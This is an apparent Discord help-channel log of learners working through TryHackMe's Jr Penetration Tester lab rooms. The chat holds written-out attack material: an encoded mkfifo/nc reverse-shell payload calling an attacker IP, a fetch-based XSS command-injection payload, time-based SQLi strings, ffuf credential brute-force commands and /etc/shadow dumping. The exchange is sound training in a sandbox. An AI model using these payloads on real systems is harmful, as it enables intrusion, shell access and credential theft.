#junior-pentester-path

gonna restart the machine i think

Post a screen of that new request pls. I doubt the issue is on the target machine.

BINGOOO, worked after restarting the target machine

@shadow echo thanks for helping with that, the 2 extra lines i think were the issue

Gave +1 Rep to @shadow echo

Hey guys! I working the room https://tryhackme.com/room/authenticationbypass During task #3 we're asked to use the previously generated valid_usernames.txt file to bruteforce the login page. The thing is when i use ffuf to accomplish this it returns no valid combination. At first i thought i had typed something wrong, so i copied and pasted it the commands into my Kali VM shell. The results were the same, so i wondered if it could be the version of SecList i was using, so i booted the AttackBox on the website, did everything again and the result was the same. Someone else had this issue?

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200

The location of seclists will be different

I know, i had this problem. ffuf just runs fine, it just can't find a match.

Check your username list. There should be only 1 username per line and not the status codes or any other stuff in it.

Gave +1 Rep to @shadow echo

Will try. Thanks!

That did. I wonder why though. I used the -o flag during Task 2 to generate the file. I guess this is somehow incompatible. Thanks again, anyway.

anyone can explain more about flag seem in lab mostly has finding the flag but in real what is advantage ? what is flag ?
i just start with tryhackme

it okay just make sure, cuz i'm not clear on that

thank for give an example

Gave +1 Rep to @steel nymph

Thanks for the further info on this!

Gave +1 Rep to @steel nymph

Anyone was able to craft a ||POST request in Burp|| for solving Challenge 3 (flag3) in File Inclusion room ? I broke my head trying to solve that, I eventually did it via ||curl -X POST|| request but very keen to know what I was doing wrong in Burp.
What I did in Burp is ||I intercepted GET request when tried to include LFI path via the web, sent it to Repeater. Changed method to POST, removed ?file=<path> from url and appended file=<path> at the end of POST request just on a new line. When trying to POST it that way the page is loading without any errors/indications at all. I tried to strip all other variables from the header like User-Agent etc... leaving only POST line, Host: and file=<path> line but still the same. Identical thing is working fine when POSTing with curl 🤷 ||

That is exactly what I did if you read my hidden msg. Or you mean something else?

Yeah I let one empty line before the body, and 2 empty lines after the body (if that makes really difference not sure if tbh)

Inspector ? Let me check

Yeah file= is in body

Remove the empty lines after the parameter in burp or whatever you use, otherwise this will cause to be appended to your parameter. Not sure if it would also matter with the null byte at the end, but without it, it does.

Hey, I've got the flag for Command Injection Task 5, but I don't think I've understood it correctly.
I followed the aforementioned technique in Task 3 and ||combined commands 127.0.0.1 && cat ../../../home/tryhackme/flag.txt to get the flag, but I don't understand exactly why cat ../../../home/tryhackme/flag.txt|| wouldn't work by itself? Is it purely a case of filters?

You should ask yourself why by entering 127.0.0.1 into the field the site responses with a ping result.

Do you know what && does?
It will only run the second command in a certain case

As far as I was aware that operator was just to combine commands

There's a tiny bit more to it than that

Try to answer my question. Why by merely entering the IP the site shows the ping command result.

Because it's intended purpose is to return ping results

Right. So "ping" is running already. If you would just enter cat ... it would execute ping cat ...

Yea I got that once I'd answered why ha. Sorry, very sluggish today, thanks for the prompt 🙌

Thanks @modest arch

Gave +1 Rep to @wispy nimbus

The only other context I can think of is in that of booleans. But I got the gist anyway 🙂

Yep

cat /etc/shadow && pwd for example won't run pwd if cat /etc/shadow fails.

So because you're missing an argument to ping, it exits with an error code, and thus the second command doesn't run

Thanks @idle bison

Gave +1 Rep to @idle bison

In fact, I wonder if you tried ; cat whatever

Authentication Bypass (Username enumeration)
You can manually create a valid_usernames.txt or add to the ffuf command the following:
-of csv -o templist.csv && sed '1d' templist.csv >> templist2.csv && cut -d"," -f 1 templist2.csv >> valid_usernames.txt && rm templist*.csv

Lol.. yup 😄

Full paths are usually a good bet

How can I connect my try hack me to my own linux and continue with mine

Please don't ask the same question over several channels

Why

Because it's spammy

Ohh Sorry about that...I wanted the fastest response that was y I had to send to different channels

Hi guys, any ideas for this problem?

linux privesc task 11

shell has right permissions

code is fine

idk why it doesn't work

Nearly. Owner is wrong, that's a part of the permissions

At least if you're trying to become root

How can I fix it?

No ideas :/

Have you done the linux fundamentals content?

Ohh, give me moment

I got this! Thanks dude 😄

Gave +1 Rep to @idle bison

There was problem with owner of shell

I'm on the metasploit meterpreter room and my initial access keeps failing

-] 10.10.138.244:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.

do i need to set the SMBSHARE option?

Could you send a screen of your options?

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.10.138.244    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Pasword1         no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               ballen           no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.13.26.238     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Is the lhost your tun0 IP or you are on the attackbox?? And how long is the machine already running?

it is and 10-15 minutes or more

I've got 1:35 left

so... maybe 25 at this point

password is missing a character

Ah, ye now I see it too 😄

got it. sorry. typing is hard lol

Hello everyone! I am at the Cross-site Scripting Task 8 Practical Example (Blind XSS) I am able to catch my cookie session via NC listener, but I don't manage to get the staff-session cookie. Can anyone give a a nudge?

Try it on the attackbox or the request catcher in case you are doing on your own machine. People reported it's working better there. In case you get nothing within 2- 3 mins with these options try to restart the target machine.

did it already. still same result

And the result is that you get no request? Or only of your own session?

No request

I think I'm doing something wrong on the request catcher

Well if you verfied by manually opening the ticket that you get at least your own session cookie so that you know your payload is working, I think all you can do is restarting the target machine and try again.

I restarted the target machine several times already

on the request catcher should I also mention the .log.tryhackme.tech at the pqyload?

You are not putting the payload in the subject field, are you?

Well haven't you verified by manually opening the ticket that your payload works correctly?

I tried several things and on the only method that worked for me so far is with the NC listener. I only managed to get my cookie session when I opened the ticket

Can I dm anyone to check if the payload that I'm using is correct about the request catcher?

Well the request catcher link, for example of my session looks like this 29a6cfa6006ff6d7539ccf80bd490607.log.tryhackme.tech

So that's the full url you have to put in the payload for your request catcher

You can just paste your payload here, or send me a DM with it

Does anybody know how to only capture requests from one specified url in Burp Suite?

Scope

I set Target > Target scope > include in scope to machine ip and Set Proxy options intercept rules URL is in target scope, and I'm still capturing https://tryhackme.com/socket.io requests. Am I missing something?

Yeah, those are websockets?

Hiya, apologies is this is a repeated question. I have two flags for "Walking an Application" but they aren't being accepted by the form.

Has anyone has experienced this?

Every other flag is correct, it's just the two that aren't.

So I have the flag from the framework question at the end of the "Viewing Source" section and I have the flag for the last question but the fields keep saying incorrect.

|| THM{CHANGE_DEFAULT_CREDENTIALS} || and || THM{HEADER_FLAG} ||

Yeah there's other flags in there from other challenges

I've found a few myself and went "huh?"

Ah right

Thanks team.

That's me, I'm team now

when it says I have three machines open, is there a place where I can turn them off?

I started my machine in task 1, and I am trying to access my attack box but it says i cant have more than 3 open? not sure how that is... sorry for my noob question

looking now

because when I have a task, I start the machine, and then I start my own attackbox, correct?

you can just use the ip address and go from there in your own vm?

THANK You so much by the way

youre right, i had the machine open in the first lesson

can I add people to then message later?

awesome man. im an cyber engineering major (just started) but know I have to actual try to break stuff on my free time

not something you just regurgitate from a textbook but this is overwhleming making sure you have things set up right

ok so this is normal right? no clue what I am looking at ha. I was about to pull my hair out

just to get a hang of everything? I have some linux and networkbasics

not an expert but just surface level stuff and I know my way around linux command lines

you know a worthwhile difference in the junior penterst and offensive pentesting?

isnt that the same thing basically

ohhhh so def do jr pentest before offensive

Jr pentester is essentially an intro into the world of pentesting specifically, where as offensive pentesting assumes you already know the basics and challenges you to learn more

need help on the ssrf task 2

Hi, can I help?

yes pls

i know that i need to include the &x= but im not putting it into the right spot or i need to eliminate some things

https://website.thm/item/2?server=api.website.thm/flag?id&x=&id=9

this is what i have right now

why &id=9?

i need to force the webserver to give me information on id 9

if it's an id based resource then shouldn't it be https://website.thm/item/9 ? also the request params you have there contains two ? you got this

so i still request from the server but itll be a request to id 9 and then &x= to omit the rest/the part for id 2

i figured it out

once i looked at the server requesting i put in the part that i wanted after the server=

which was the url they gave us

just shortened

when that didnt work and i saw the server requesting i saw that the end wasnt letting the page go through

🎉

does the junior pentest help and go through ctf?

it introduces you to some of the most common tools used by pentesters

i'd say it helps with playing CTFs to some extent

Finally finished the path

Very satisfying

you might be (more) ready to attempt the eJPT now... lol

Honestly I kinda messed up on that regard

I put a lot of my eggs into the "general security" cert basket and now I'm tapped out of funds for more until I can swing a job

Got my CISSP tho

Which I can't list on my resume

😄 woo

nice... that's not an easy cert- wait what

why can't you put it on your resume?

I don't have the experience required to "get it"

You need to pass the cert AND have the experience

Otherwise they'll take away all your certs and ban ya for life if you put it on your resume

(or so they threaten)

ohhhh... yeah the 5 years of required experience is a pretty big gatekeeper

Yeah in hindsight I don't know if that was a great investment

But oh well

iirc you have 6 years after getting the CISSP to earn the 5 years of required experience

Yeah so I'm cool on that, and I already have 1 satisfied by my bachelors in cysec

assuming that one has no IT experience at all, they'd have at most 1 year for not getting any experience

So I have 6 years to get 4 years very doable

better find an IT job if you wanna keep the cert 👀

I'm tryin D:

are you not able to add a screenshot in this chat? I see it on personal message but I dont see it here. thanks!

i think you could add screenshots?

yeah i could

where is that at? I dont see it

you could either copy the screenshot to your clipboard and press Ctrl+V to paste it in here

or you could click on the circle '+' button to the left of the chatbox and select the screenshot file to share here

i think you could also directly drag and drop the screenshot here if you've saved it as a file

I think you need roles to do it here

I can't do it either

I have no role

ah so you might need to verify your account here before you could do that

!docs verify

got it!!!

thanks

As have I 😄

would love the help if anyone could assist.

i was just able to download staff.txt (which i beliebe have a password in it) but I cant find it so far.

any ideas where this would be on my system

found it!

I was able to find the username!!! now we move onto the password

such a good feeling when you crack something....

You try /etc/passwd and /etc/shadow ?

hello everybody. Is there someone who could assist with the LFI - I have one question on a task to proceed

Ask away. I'll see if I can assist.

which task is it? the last LFI challenge could be quite difficult

that one took me quite a while to figure out

Hey ... any advice for running the "fuff" command ... ran from attack box and says it's not found

ffuf, not fuff

thank you! 🙂

FFUF, short for "Fuzz Faster U Fool"

Can anyone tell how to execute .elf shell in target machine

I am doing msfvenom task in metasploit room 2

Is this suggestion for me?

lol

I covered those rooms long time ago

I am getting segmentation fault

I never executed .elf file in linux so I thought maybe it will execute in different way

ok Let me check again

I accidentally used the default handler

you were right

Thank you

can anyone explain this error?

I need user ntlm hash but only getting the administrator one

Not sure but I think you can not run it inside meterpreter shell like that. Try to background the session and then choose the hasdump module where you set the session to the session you have in the background

Both are same

Did you try another hasdump module? As I think there are a few

Nmap Live Host Discovery task 2 subnetworks. I dont get any responds when using the website, is it broken?

Did you answer the questions on this task?

not yet

And when you sent a request from computer4, did you get a response?

no, I tried multiple packet types and computers but never get any response

I don't know why you tried multiple computers and packet types. The site works for me.

I tried it to see if I could trigger any response from the website

Do you see packets "travelling"?

nothing is happening at all, I will try another browser

Try refreshing the page perhaps.

Google chrome works now, not on safari appearently

anyone available who completed attacktive directory?

I am having issues with Challenge #1 on the File Inclusion module. I have tried changing the GET to a POST in BurpSuite and also changing the GET to POST in developer mode and I still cannot view the flag 1 file...Does anyone have some suggestions?

No worries did it

Thanks for the help 👍 I was missing the / after port

Gave +1 Rep to @steel nymph

In the linux privesc room -- I'm on the box, but I can't find anywhere with write permissions. (task 5). Anyone able to offer a hint?

nvm, I'm supposed to be looking for a kernel exploit first, i think

thanks for the help

Gave +1 Rep to @steel nymph

https://tenor.com/view/wile-e-coyote-introduce-super-genius-bugs-bunny-gif-11452605

I need help on the jr pen test

i cant post images.

*** Generating Wordlist...
(!) FATAL: Error opening wordlist file: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

thats what i get when i enter
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://MACHINE_IP/FUZZ

Its in the

Task 12 of content discovery

called Automated Discovery

There are 3 diff commands for this

None of them work

all give me an error to do with it not existing

Via AttackBox or OpenVPN?

im using my own VM

but i tried it with attackbox

and i got the same error

/result

Wait

wait

.

Are you positive that the wordlist exists at the given path?

im not positive let me check

ls /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

okay so

it was

in /usr/share/seclists/Discovery/Web-Content/common.txt

for some reason

there we go

i had to confirm

@modest arch Thank you

Gave +1 Rep to @wispy nimbus

Well I downloaded an app called postman API examined get requests, changed some variables still nothing different I couldn't achieve in developer mode or Burpsuite. Still missing some key piece of info here.😩

Lol, i didnt mean it litteraly

you need to become the POSTman

thx, this was like playing battleships I was all around the target but couldn't sink the ship. What's interesting is I did external POST requests with such info and it got me nowhere but when I used the embedded form POST it was reading in the buffer so it spewed all characters and yet the same POST request got me nowhere. I did play around with the form POST much earlier but I guess maybe I ignored something because Burp at one point changed its output. Thanks solved.

So, I'm working my way through the Command Injection room and in Task 5 you're asked to attack a website. Easy enough.
Out of curiosity, I was wondering if it was also vulnerable to XSS. Which it is, for the standard <script>alert('Test');</script> payload.
I was wondering if there was a way to get the Command Injection to output inside of the XSS window? Ie:
;id;
into
<script>alert(String(;id;));</script> or something of that ilk.

Possible. One way I can think of is that you can replay the request inside the script.

Inside the form address, the XSS will be

<script>window.onload = fetch(`/?address=127.0.0.1+%26%26+id`).then((response) => console.log);</script>

then you can start parsing the results body in place of console.log

Hi all! I'm trying to do https://tryhackme.com/room/linprivesc task 5

but i'm getting a file not found 404

anyone has an idea whatsup

What is it you're trying to do/look for?

Trying to download the exploit from the attacking machine to the target machine

have already compiled, so in the target machine i used -> wget http://ipaddress:8000/filename

getting a 404 for some reason .

Says file not found.

Make sure that you've set up your http.server in the directory where the exploit is stored, also it could be worth trying a different port (I usually go for 9001 and have never had any connection issues)

omg!

Didn't set the http.server in the directory

Silly me. Thanks @low cloud !!

Gave +1 Rep to @low cloud

Not an issue, happy hacking!

anyone completed splunk 2?

@modest arch Please don't ask the same question over multiple channels
Please ask your question directly

sorry about that just wanted someone to discuss with privately that's all 🙂

Can anyone tell me what is the intended way of finding password of user2? In Linux PrivEsc > SUID Task

Have you looked for suid binaries?

yes i got base64 which i used to output shadow and passwd file.

Ok, have you tried to crack the hash for that user?

i did using hashcat i got pass for gerryconway only.

is the intended way to find password is cracking hash because they didn't mention which dictionary to usually they do to reduce time for cracking.

Use rockyou?

I don't know, but I can add one and one and realise that if you can read the shadow file and it's asking for the user's password then cracking the hash is a good route.

what i did is tried the same password for my current user and it worked on user2? But user2 doen't have permission to read flag

You know

so i thought guessing wouldn''t be the intended way

You can read any file

Right?

yes

Ok. The user doesn't have permission to read the flag.

Do you see what I'm getting at?

i tried i think but i don't know the location of flag.

Then how do you know you can't read it?

oh i think i didn't try it after i was user2 so stupid ok l'm gonna try now. (this happens when you practice at 2 in the morning)

I got the flag👍 but i don't feel comfortable getting user2 password by guessing and not using john or hashcat

I think the point of it wasn't to guess but to look at the shadow file and the hashes in particular and see if you notice anything similar

it wasn't similar although the passwords were same hashes were not

can anyone tell me how much time it takes to see the request come through containing the victim's cookies in XSS LAB

its already been 3 mins. no request is been seen from other side

you should've something by now

yep

thanks

Gave +1 Rep to @steel nymph

it worked

could i get a tip on sql injection on task 8, i know that || table_schema = 'sqli_four' table_name='analytics_referrers' and column_name='id, domain' || im trying to input || from analytics_referrers where id like 'a% || and ive tried basically every input on my keyboard but im not getting anything, i also am not getting any errors if i change the from statement up a bit i get errors but not when i run it like i wrote it

sorry i edited the text i pressed enter too early

why am i not getting errors lol

i got it thank you

Hi guys
Working on the Cross-site scripting practical example (blind xss)

Im using the TryHackMe request catcher however it does not seem to be fetching the cookies

Anyone else have any trouble with this?

Can anyone in the Burp Intruder room help?
Task 8, please.

Can anyone?

Task 8 says the following: How many request will intruder make using these payload sets in Cluster Bomb attack?

can anyone help on Walking An Application please. I was stuck on task 3. unable to access the URL. I have replace the URL with IP but same error 504 gateway time-out

cluster bomb tries every possibilities, and you have 3 sets of 100, 2 and 30 lines.

the url is not a typical IP address, you have "-" instead of dots

do you catch your own cookies ? if yes, try to restart your attack machine, it seems some people have trouble with this.

thanks for the advise. I will have this a try

Gave +1 Rep to @copper sentinel

Can anyone help me Task 9 - Linux PrivEsc Room? I change crontab to revershell to attackbox. but seem crontab not running or what i wrong

Thank @steel nymph, i tried running the bash command as karen, and it can call back to attack box. let me tried another method

Gave +1 Rep to @steel nymph

Yes, I'm restarting attackbox and target machine. Let me try with the bash script as karen

Thank you @steel nymph, i solved the problem.

Gave +1 Rep to @steel nymph

Im having a problem with the ffuf command in subdomain enumeration room

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.120.61

Hey guys, new here. I'm a complete beginner to cybersecurity, I'm trying HTB and THM as a hobby and I love it. I, however don't really understand how to get flags. For example root flag, or user flag, etc. I have kali installed in VM. Would love some help here.

I didn't understand how to do this sum.

Hey bud, Im not at my computer right now but when i get on a little later I will check to see if I can see the cookie under inspect --> Network
I have tried both the THM Attack Machine as well as through Firerox using OpenVPN while turning off the built in security feature but i dont seem to get anything on the THM catcher

@copper sentinel

Eyyy, can i ask about the JR Penetration tester > Introduction to web hacking > sql injection > Task 8 Blind SQLi - Time Based

dont ask to ask, just ask

Ye i'm searching through old messages

I am able to get the session cookie now in the Cross-site scripting room however i have tried both base64 encoded and decoded values but it's the wrong answer

Can anyone advise on this?

You need to get the staff cookie.

So for that am I targeting the website URL?

@modest arch

@chrome sand See @shadow echo post. #subs-room-help message

SQL Injection Task 8:
As a first enumeration step, this seems to be the right input, bus seems unreal:
||admin123' UNION SELECT SLEEP(5),2 where database() like '_________';--||
Is _ being treated as a placeholder?

Hi. I'm stuck in the Vulnerability Capstone challenge.
Here's what I did:
|| I used the exploit at /usr/share/exploits/vulnerabilitycapstone/exploit.py in the attackbox. I opened a netcat listener on the same machine on port 5555. I ran the python exploit, typed in "shell_me" and entereed my IP:PORT in the required format. ||

However, I'm getting a response like this:

|| HTTPConnectionPool(host='http', port=80): Max retries exceeded with url: //10.10.234.210/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27rm%20/tmp/f%3Bmkfifo%20/tmp/f%3Bcat%20/tmp/f%7C/bin/sh%20-i%202%3E%261%7Cnc%2010.10.34.112%205555%20%3E/tmp/f%27)%2B%27 (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f1435399ba8>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution',)) ||

I restarted the attackbox, vulnerable VM both as mentioned by someone in the chat before.
Any idea what I can do to solve this issue?

You might have to look it up what the _ is deemed as. But yes, something like that, wildcard/placeholder.

Did you use python3 to run the exploit?

Hello everyone. Anyone working on the Linux PrivEsc room in this path? Stuck in the SUID task and would like some guidance. I have obtained the hash of the user2, but I cannot use any online tool to crack it under SHA512 or MD5. Furthermore, cannot install John on the server. Also not able to create a new user in the /etc/passwd file.

Hi everyone im suck at time based blind sqli

Why would you have to install John on the server? Do it on your local machine with John.

when i input this command it doesnt give me anything referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--

can anyone help ?

but
referrer=admin123' UNION SELECT SLEEP(5),2; this command does work

Well that would mean the database name doesn't start with u

ahhh i see

so do i have to change the character ?

Yes, you have to go through all characters until you get a response, then you know with what character the database name starts with, then you do the same for the 2nd character and so on

Understood.. Thankyou so much

hello folks, anyone there who can answer me a question on how to access the windows box? There is no login data provided in the privesc section

Check the other tasks, the username and password will be the same for all the machines in that room

This means that if like 'sqli_five' is positive, it might still not be right, since _ could be a placeholder. So every time you get an expected response when _ is included, you would have to verify with = instead of like?

Well not sure if the _ is not deemed as a placeholder when you use = But regarding to the other database names format, you could assume that the _ within that name is not a placeholder.

are there extra steps that i need to do ?

I got "misled" once I got to 'sql' I added a bunch of _ and got the 5sec delayed response. I only figured that out by the next step that the name was not correct. BTW, = doesn't take _ as a placeholder. Just in like.

Why would that be the password? The password is stored inside a table in that database. So since yet you only got the database name, the next step will be to enumerate the table names within that database.

jesus sqli is complicated

... thank you ill look into it

Gave +1 Rep to @shadow echo

Oh okay, ye if it's not taking it as a placeholder within the = then it's anyways an easy task to verify it 🙂 And I was also stuck with the _____ in that task until I figured out it is some kind of placeholder 😄

Thanks for the assistance. I am just wondering if this function can be helpful to enumerate things quicker/easier... (what could be the benefit of using a placeholder over a wildcard)

Gave +1 Rep to @shadow echo

Well like I said I'm not sure what the _ is really deemed as. But in case it is a placeholder, the benefit would be that you can figure out how many characters are used immediately, which you can't figure out with the wildcard. But as I said, I haven't looked up what the _ is used for, so don't take that as true 🙂

@shadow echo Might interest you:
https://www.w3schools.com/sql/sql_wildcards.asp

Thanks god finally understood sqli

I have to re-read everythng

To understand more clearly Thanks @shadow echo

Gave +1 Rep to @shadow echo

Oh okay nice, ye then regarding to that I would assume it would work to figure out the amount of characters with the _ So as the database name has 9 characters, if you try using like '_________' (9x _) it should give you a positive response. In case you only use it 8x or 10x it should not give you a positive response, so therefore you figured out the name has 9 characters. But maybe it's not that reliable, as in case there is another database that also has 9 characters you would also get a positive response, but it was just an idea on what benefit you could have by using the underscore

I guess if you automate the process, knowing the number of characters is crucial. Is it doable with Burp? (haven't gone through that module yet)

I mean for that task it might be possible, but I guess you anyways would have go through all character positions on your own, but at least for each position you could do it automatically with burp.

Hi, I'm working through file inclusion on the jr. pentest pathway and I'm stuck on the challenge 2 question. ||I believe I need to send a new "GET" request so I've tried changing the cookies from THM=Guest to THM=admin but its not working. Am i missing something?||

I'm getting frustrated lol. I feel like I have played around with it as much as possible but I still can't find the code

Do you see how the warnings and the site in general behaves when you play around with the cookie?

No.. Am I doing it properly? ||I'm using Network under dev tools, then clicking one of the files > edit & resend > and changing cookies: THM=Guest to cookies: THM=Admin||

get a cookie editor addon on firefox/chrome

I mean I guess you could do it that way. But as I assume you are on firefox, you can simply go into storage in the dev tools, change the value and refresh the page

Thanks. That's a much simpler way of doing it

Gave +1 Rep to @shadow echo

Why isn't "> part making any problems in my XSS payload.
here is the screenshot of my page source. It worked I just feel like it shouldn't have!

Well the value= field from the input tag is closed with both of the " " and the input tag itself with the > and all the other tags are also properly closed. So in that case I assume it's just getting displayed on the web page itself as text and is doing what it's supposed to do.

One more doubt? why the following is happening both are collected form same page.

HTML parsing isn't quite like programming language parsing.
It tries it's best to understand it within the rules

It's added by javascript. When you view page source, it doesn't show the current state. Inspect element does.

Thanks its clear now.

I am doing Windows PrivEsc task 5 (using web interface) and need to change user to Jack but I cannot find option to do that. I tried:

• logout (but then automatically I am login back in without asking to select user)
• Alt+Ctr+Del (this did not work using osk)
• Lock (this does not give option to login as different user)
• tried to disable auto-login via user management (netplwiz) but am standard user so cannot do that
  Any hints would be most appreciated

One possible avenue is to run cmd as different user as this option is available from windows explorer 🙂 (seems I messed up changing Jacks password tho so need to revisit)

Doubt in Task 8 of XSS both the following didn't send any information to my netcat server.
the underlined statement is what i entered in ticket content box.

The following was working

You could just also RDP in as a different user

It says I dont have access to that link

@modest arch nvm, I got verified and it took me to the link, thanks! I will check it out and see if what he said works for me

Gave +1 Rep to @wispy nimbus

I copied the hash of the user into a txt, but John couldn't work on it. On further reading, I discovered that both the shadow and passwd files are needed for the GECOS information... how do I do that? A simple copying the information will help? I can access the information completely on the /etc/passwd and /etc/shadow
Room: Linux PrivEsc, Task : SUID.

Burp Suite: Repeater
Task 7
Can someone explain please why ||-1|| causes a 500 error whereas *1 a 404 error?

yes it has, but the server doesn't have john and also doesn't let me install. Further, not able to add a root user in /etc/passwd...

So you solved it now, or you still stuck?

Thanks for that. I'll try to look deeper into this.

Gave +1 Rep to @steel nymph

still stuck...
@shadow echo @steel nymph

It was a long slog, but I learned so much! Thank you @tiny bluff

So in that task there is an example of how to use unshadow on the /etc/shadow and /etc/passwd files. All you have to do is copy the contents of the shadow file from the target machine and create a new file on your own machine and paste it in there. Then do the same for the passwd file and follow along with the steps in the task. So there is absolutely no need to install John on the target machine or whatsoever.

A little help please. I am stuck on Linux privesc room task 6 in which two methods are shown: 1) run apache2 with config inclusion and 2) use LD_PRELOAD with sudo enabled commands. However none of these seem to be available.

1. apache2 does not seem to be installed

karen@ip-10-10-121-154:/tmp$ which apache2
karen@ip-10-10-121-154:/tmp$ find / -name apache2 2>/dev/null
karen@ip-10-10-121-154:/tmp$

2. The sudo -l does not allow LD_PRELOAD

karen@ip-10-10-121-154:/tmp$ sudo -l
Matching Defaults entries for karen on ip-10-10-121-154:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User karen may run the following commands on ip-10-10-121-154:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano

and trying gives an error ```sudo: sorry, you are not allowed to set the following environment variables: LD_PRELOAD

It almost seems I am running wrong box...

You found 3 binaries you can run with sudo, so as the LD_PRELOAD is not set, you might want to use these for priv esc

Thanks @shadow echo, let me try (seems so obvious when you pointed that out!)

Gave +1 Rep to @shadow echo

ok nice! I will work on that, thanks @shadow echo

Gave +1 Rep to @shadow echo

I'm doing challenge 2 in File Inclusion. I have completed the challenge and it says "This is a admin web page! Get the flag!" but I can't find it. Should it be on the page or do I need to traverse to another one?

have you checked the website source code????

I've checked the source code already and thanks @steel nymph I will

Gave +1 Rep to @steel nymph

Finally finished it. So many broken rooms that I needed to figure out fixes for to move on. Burp Suite was a constant pain to keep working.

I keep getting sandbox errors and have to change a bunch of settings each time I open an Attack Room. Browsers won't open from inside it in attackbox.

Cc @primal whale

Thanks @idle bison hey @finite summit sorry to hear that. Do you know the rooms that you had these issues with using the AttackBox exactly? (a URL for the rooms would be super userful if you could)

Gave +1 Rep to @idle bison

I’ll try to replicate it and investigate it as best I can

Although it sounds like it's not related to the room?

No it doesn’t sound related to the room

But if it’s happening in x/y/z I could recreate it quicker in theory

Rather than just trying random rooms until it occurs

Jr pentesting burp suite

All of the rooms in that module?

When you open the AttackBox and start machine, once loaded. Burp Suite would give the error on sandboxing when you tried to use it. I did find a work around for that. Some of the other features like opening browser failed.

Damn.. I'm annoyed at how long I spent struggling to find the flag on chall2 in the File Inclusion task

It took me too long to realise what to change the cookie to

I agree some rooms are way harder than they should be for a learning experience

Well the Jr. Pentester Path is marked as "Intermediate" so..

It's a challenge in a pathway that's marked intermediate. I think the difficulty us exactly where it should be

I look at Try Hack Me as a learning classroom to help teach you the skill set of each room. Some are designed better to give you the knowledge and provide a sandboxed attack box that you can safely apply what you are learning.

Yes but the goal is for you to learn. Challenges are a way if testing your understanding. They're designed to be hard but if you really understand what you're learning they aren't all that difficult to complete

I started in learning mode to work through all the tools. I built a Kali Server on my home network and have Ubuntu servers on my VMware Server.

Hello, In the "Introduction to Web Hacking-Walking an Application: the last question requires me to type the flag in the response header, I found it, copied it, and it tells me the answer is wrong. Is it possible that there is something wrong here? or am I looking in the wrong place

I dont want to spoil the answer for others just in case

alrighty then, thanks

Your point is?

In learning mode right now. Not challenge mod to practice. Many tools to learn to use for work.

I will go back through the list and tell you. Blind SQLi, Linux and WIndows PrivEsc could have been more clear in the notes. I have my B.EE. The text books ( for most classes were 4-5) explained the material to a certain level. Class instruction went over gotchas and what not to do. The labs brought together the material. The professors would give you real life work projects you would build for customers. You would have to design, price, cost analysis, MTBF, etc.

There's a feedback form linked in #feedback-and-ideas
This is the sort of things that I'm sure the site staff would absolutely love to know

I didn't notice that section. I design my web sites to show how to do various tasks and put my notes in it for everything I do.

You can add that to the feedback form too

Too many walkthrough pages with the answers on it help when I really get stuck for days. You don't need to know the answer only where to quickly find it and how to apply it. I have limited time to work on this material. I also have web sites on Arduino and Raspberry Pi builds that I do. Add in a wife, 3.5 year old and 6 year old that get priority over everything else.

I'm not THM staff

Put it in the box and they'll read it.

Uh, what?

While we're at it:

Cc @primal whale

There's a whole explanation of what that is and why it happens in the room, at the first place you are told to open the browser. If you're trying to open it before that and having to debug it yourself, that's entirely your own fault

TL;DR (for CMNatic's benefit) -- that ain't an AttackBox problem. It'll happen whenever you run Burp as root on Linux.

I found that one a few weeks ago. I try to give THM about 30-60 minutes a day at most. I can usually get in some of it at work between chaos and endusers.

could anyone possibly explain the highlighted part in a more simpler way... it's the authentication bypass module - logic flaw

^ not really getting it

I'm having issues with the Task 3 of the Protocols and Servers section in network security. for some reason it's not allowing me to retrieve the flag from the server. I restarted the VM multiple times and made sure I was entering the correct commands, any suggestions?

What are you trying to get the flag?

The task want you to retrieve the flag using telnet, when I try to connect it says "Connection closed by foreign host".

So what have you entered in the telnet session?

GET /flag.thm HTTP/1.1 Then host: telnet

Did you press enter 2 times after host: telnet ?

Nope, I just recreated the scenario and made sure to not press enter more than once

Then press enter 2 times after host: telnet

a real head slapper, thank you @shadow echo

Gave +1 Rep to @shadow echo

Just finished this path!!! Feeling really accomplished. Which path should I do next?

can anyone help me with this. This question is the last one to complete jr pentestration path.?????????????

the payload is right??

its working now, I'm getting data in nc but the cookie is same as I'm getting in cookie editor firefox extension and its not working as answer😢.

what can i do???

btw I'm not login as admin cause it didn't day anywhere to login as admin in XSS.

If you open the ticket on your own, you obviously only get your own session cookie. You have to wait until the automation that's going to open the ticket as staff member will be triggered. Shouldn't take longer then 2- 3 mins at most.

